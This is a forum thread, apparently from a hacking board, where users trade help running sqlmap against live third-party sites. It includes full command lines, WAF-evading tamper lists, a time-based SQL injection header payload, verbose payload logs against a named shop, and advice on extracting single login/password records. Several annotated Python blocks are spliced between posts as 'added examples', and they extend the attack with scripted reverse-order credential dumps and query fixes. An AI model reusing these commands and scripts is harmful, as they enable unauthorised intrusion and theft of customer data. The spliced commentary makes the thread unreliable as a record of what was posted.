Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. RWD (Member)

    https://github.com/sqlmapproject/sqlmap/wiki/Usage

    Turn off payload casting mechanism
    Switch: --no-cast

    When retrieving results, sqlmap uses a mechanism where all entries are being cast to string type and replaced with a whitespace character in case of NULL values. That is being done to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to ease the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).
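
What the casting mechanism described above actually changes, as an added example that is not part of the original post or of sqlmap's code: a small SQLite simulation (standing in for the target's MySQL; concatenation with NULL yields NULL in both, and `IFNULL(CAST(col AS CHAR), ' ')` is the shape of the wrapper sqlmap applies on MySQL) showing a column-concatenating retrieval with the default casting and with what `--no-cast` does, which is simply to drop the wrapper. The table and its two rows are constructed.

```python
import sqlite3

# Constructed sample table standing in for the target DB. SQLite runs
# offline; the behaviour shown (concatenation with NULL yields NULL) is the
# same in MySQL.
ROWS = [("admin", "s3cr3t"), ("guest", None)]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(login TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return db


def wrap(column, no_cast=False):
    """Column expression as sqlmap builds it: by default every value is cast
    to a string and NULL replaced with a space; --no-cast uses the bare name."""
    if no_cast:
        return column
    return "IFNULL(CAST(%s AS CHAR), ' ')" % column


def retrieve(db, no_cast=False):
    """Fetch login:password pairs the way a UNION/error-based dump concatenates
    columns into one string. Returns a list of strings, with None where the
    concatenation collapsed to NULL."""
    query = "SELECT %s || ':' || %s FROM users ORDER BY login" % (
        wrap("login", no_cast), wrap("password", no_cast))
    return [row[0] for row in db.execute(query)]


if __name__ == "__main__":
    db = make_db()
    print("default  :", retrieve(db))                # ['admin:s3cr3t', 'guest: ']
    print("--no-cast:", retrieve(db, no_cast=True))  # ['admin:s3cr3t', None]
```

With the wrapper in place the guest row survives as `guest: ` (the NULL became a space), which is what sqlmap relies on when it splits the retrieved string back into columns; without it the whole row comes back as NULL, which is the "None values are returned back" failure the wiki text refers to, seen from the other side.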
     
  2. NewbieOnHack (New Member)
    Thanks, but I didn't understand why I bypassed the filter with this method (with the SQL query in the URL string I was getting a 504, which meant the filter was dropping the connection).
     
  3. 4sh0T (New Member)
    Hello everyone, I'm sorry for not being able to speak Russian. I can translate if necessary, but I thought I'd try it in English first.
    I got a site which is vulnerable to SQL injection; however, whatever I try, it doesn't exploit the vulnerability. Also the WAF blocks some payloads, so I used Atlas (https://github.com/m4ll0k/Atlas) to identify the WAF, but it didn't manage to identify it; however, it suggested some tampers to me before the WAF blocked my IP. This is the response I get when I manually type in ' behind this site:

    https://www.site.xx/xxxx/product.php?id=47' (I enter the ' myself)

    "MySQL error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND p.products_status = 1 GROUP BY p.products_id' at line 1

    SELECT * FROM products AS p LEFT JOIN products_description AS pd ON p.products_id=pd.products_id WHERE p.products_id = 47\\\' AND p.products_status = 1 GROUP BY p.products_id

    TEP_DB_ERROR"

    command used:
    sqlmap -u https://www.site.xx/xxxx/product.php?id=47 --random-agent --level=5 --risk=3 --dbs --tamper=htmlencode,charunicodeencode,modsecurityversioned,modsecurityzeroversioned,multiplespaces

    Does anyone know how I could exploit this?
     
  4. sosidzh24 (New Member)
    --level 5 --risk 3 -v 3 --random-agent
     
  5. sosidzh24 (New Member)
    all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
    There are no errors in payloads
     
  6. Muracha (Member)
    How do I correctly build a query to the database through sqlmap if I only need one record?
    A query like
    dumps all 100500 rows, but I only need one login/password value, say from record 666 and nothing more.
    How do I build it correctly?
     
  7. karkajoi (Active Member)
    --start=666 --stop=667, or else via --where="email='[email protected]'", --where="id IN (1,3)", something like that
     
    #947 karkajoi, 6 Oct 2019
    Last edited: 6 Oct 2019
  8. Imperou$ (Elder)
    Greetings to all. A question: is there a way to set sqlmap up to dump automatically from the end of the table rather than from the start, something like start=1000 stop=1? I have to dump in chunks, e.g. 900-1000, 800-900, 700-800 etc., which is not very convenient. Maybe something can be adjusted somewhere in settings.py or the scripts, or some add-on exists, or some specific selection parameters can be hacked into the where clause by id during the dump, so that the data is read from the end of the table when dumping in order with sqlmap... Please advise if anyone has looked into this; the need comes up from time to time...
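
A workaround for dumping from the end of a table, as an added example that is neither from the original post nor a sqlmap feature: sqlmap's `--dump` has no switch to reverse row order, so the script below drives one sqlmap run per id window, highest ids first, passing each window through `--where`, which sqlmap splices verbatim into its own SELECT. The target URL, database, table, column names and the name of the `id` column are assumptions; `run` is injectable so the schedule can be checked without executing sqlmap. Where the id column is known, `--sql-query="SELECT login,password FROM users ORDER BY id DESC"` is the single-invocation alternative.

```python
import subprocess


def descending_windows(total, size):
    """Split ids 1..total into windows of `size`, highest window first:
    descending_windows(1000, 100) -> [(901, 1000), (801, 900), ..., (1, 100)]"""
    windows, hi = [], total
    while hi >= 1:
        lo = max(1, hi - size + 1)
        windows.append((lo, hi))
        hi = lo - 1
    return windows


def sqlmap_argv(base_args, table, columns, id_column, lo, hi):
    """argv for one window. The range goes into --where, which sqlmap splices
    into its own SELECT unchanged, so it must be valid SQL for the target."""
    return list(base_args) + [
        "-T", table,
        "-C", ",".join(columns),
        "--where=%s BETWEEN %d AND %d" % (id_column, lo, hi),
        "--dump", "--batch",
    ]


def dump_from_end(base_args, table, columns, id_column, total, size,
                  run=subprocess.call):
    """One sqlmap run per window, highest ids first. `run` is injectable so
    the schedule can be inspected without executing sqlmap. Returns the argv
    list of every invocation made."""
    invoked = []
    for lo, hi in descending_windows(total, size):
        argv = sqlmap_argv(base_args, table, columns, id_column, lo, hi)
        invoked.append(argv)
        run(argv)
    return invoked


if __name__ == "__main__":
    # Assumed target and schema; the dry run prints commands instead of running them.
    base = ["sqlmap", "-u", "http://target.example/item.php?id=1", "-D", "shop"]
    for argv in dump_from_end(base, "users", ["login", "password"], "id",
                              total=1000, size=100, run=lambda a: 0):
        print(" ".join(argv))
```

The argv is passed as a list, so the spaces inside the `--where` value need no shell quoting; `--batch` keeps each run from stopping on a prompt, and the row total is whatever the earlier `--count` or first dump reported.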
     
  9. Sentureg (New Member)
    Hi, can anyone suggest a bypass for AWS WAF (Amazon)?
    Or how can this protection be bypassed?
     
  10. Baskin-Robbins (Well-Known Member)
  11. vladF (New Member)
    Good day. I got this result from a scanner:

    This vulnerability affects /kontaktannonser/lista/.
    HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

    GET /kontaktannonser/lista/ HTTP/1.1
    Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

    How do I correctly compose the request for sqlmap?
     
  12. winstrool (~~*MasterBlind*~~)
    Here you first have to work out yourself what the WAF triggers on, and then write a tamper; the ones in sqlmap itself are the typical tampers.
     
  13. kacergei (Member)
    Guys, how do you deal with "got HTTP error code: 424 (HTTPError: Failed Dependency)"?
     
  14. Estet (New Member)
    What could the problem be? Everything is extracted fine; there are empty values and ones with records.
    When I try it with the "--where" option it refuses to extract. I tried other values.
    What can be done?

    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3

    [21:11:39] [INFO] retrieved:
    [21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
    [21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
    [21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
    [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
    [21:11:51] [INFO] retrieved:
    [21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
    [21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
    [21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'

    [*] ending @ 21:11:51 /2019-11-02/
     
  15. karkajoi (Active Member)
    Post 943 in this thread (previous page)
     
  16. Estet (New Member)
    That's exactly the thing: when you use where, it stops extracting. Without where, everything is extracted in order without problems.
     
  17. Estet (New Member)
    Another question: is it possible to extract data by the criterion of the length of a column's contents?
    Say I need all rows where the length of a particular column is not 7 characters?
     
  18. fandor9 (Member)
    Are you sure your column is called "Customer Group" and not "Customer_Group"? If it really has a space, try putting the column name in single quotes:
    Code:
    ./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
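
The `--where` text is spliced into sqlmap's own query unchanged, which the `[PAYLOAD]` lines in post 14 show: `WHERE Customer Group IS NOT NULL` reaches the server with the bare two-word name. The simulation below is an added example, not from any post, not sqlmap code; it runs the quoting variants for a column name containing a space against a constructed SQLite table, which follows SQL Server's rules on this point: an unquoted two-word name is a syntax error, `'Customer Group'` is a string literal (never NULL, so that filter passes every row), and `[Customer Group]` or `"Customer Group"` name the column. It also covers the length filter asked about in post 17; SQLite spells the function `LENGTH`, SQL Server `LEN`. Table name and rows are constructed.

```python
import sqlite3

# Constructed rows; the column really is called "Customer Group" with a space.
ROWS = [(1, "retail"), (2, None), (3, "partner"), (4, "wholesale"), (5, None)]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute('CREATE TABLE sb_customersTB(id INTEGER, "Customer Group" TEXT)')
    db.executemany("INSERT INTO sb_customersTB VALUES (?, ?)", ROWS)
    return db


def count_with_where(db, where):
    """COUNT(*) with the --where text spliced in verbatim, as sqlmap does.
    Returns the count, or the error text when the DBMS rejects the statement
    (which is what makes sqlmap report that it could not retrieve the count)."""
    try:
        return db.execute("SELECT COUNT(*) FROM sb_customersTB WHERE " + where).fetchone()[0]
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc


def where_not_null(column):
    """--where value for SQL Server: bracket-quote the identifier."""
    return "[%s] IS NOT NULL" % column


def where_length_not(column, length, length_fn="LEN"):
    """--where value selecting rows whose column length differs from `length`.
    LEN is SQL Server's name; pass length_fn="LENGTH" for SQLite/MySQL."""
    return "%s([%s]) <> %d" % (length_fn, column, length)


if __name__ == "__main__":
    db = make_db()
    for w in ("Customer Group IS NOT NULL",
              "'Customer Group' IS NOT NULL",
              where_not_null("Customer Group"),
              '"Customer Group" IS NOT NULL',
              where_length_not("Customer Group", 7, length_fn="LENGTH")):
        print("%-45s -> %s" % (w, count_with_where(db, w)))
```

NULL rows drop out of the length filter on their own, because `LEN(NULL) <> 7` is unknown rather than true; in the sqlmap command that means `--where "[Customer Group] IS NOT NULL"` for the original question and `--where "LEN([Customer Group]) <> 7"` for post 17.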
     
  19. brown (New Member)
    <div class="error-page">
    <h1>Oops - It seems the page you are looking for is not here</h1>
    <p>CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''DLAj29'' order by t.id desc limit 9' at line 4</p>

    It's not going through( which tamper could I use?

    Yii Framework/PDO
     
  20. Estet (New Member)
    In case it's useful to anyone:
    here, with DBMS is Microsoft SQL Server, this worked.
     